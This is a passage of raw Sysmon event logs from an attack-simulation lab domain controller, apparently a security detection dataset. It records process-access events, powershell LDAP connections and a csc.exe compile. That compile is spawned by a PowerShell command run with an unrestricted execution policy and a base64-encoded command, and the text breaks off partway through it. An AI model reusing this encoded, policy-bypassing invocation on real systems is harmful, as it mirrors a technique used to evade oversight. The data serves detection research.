b9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-857D-5FCF-9800-000000009101}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8541-5FCF-1000-000000009101}11562156C:\Windows\system32\svchost.exe{10ACEC4A-857D-5FCF-9800-000000009101}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.930{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000003203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.773{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50351-false10.0.1.14win-dc-935.attackrange.local389ldap 354300x80000000000000003202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.767{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50350-false10.0.1.14win-dc-935.attackrange.local389ldap 354300x80000000000000003201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:03.752{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-935.attackrange.local50349-false10.0.1.14win-dc-935.attackrange.local389ldap 354300x80000000000000003355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:05.801{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruetrue0:0:0:0:0:0:0:1win-dc-935.attackrange.local50352-true0:0:0:0:0:0:0:1win-dc-935.attackrange.local47001- 10341000x80000000000000003354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-A200-000000009101}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-A200-000000009101}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.913{10ACEC4A-857E-5FCF-A000-000000009101}19764100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-857E-5FCF-A200-000000009101}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81928CE4F) 154100x80000000000000003342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.923{10ACEC4A-857E-5FCF-A200-000000009101}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ugdo1hjh.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-857E-5FCF-ED48-060000000000}0x648ed0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-857E-5FCF-A000-000000009101}1976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyA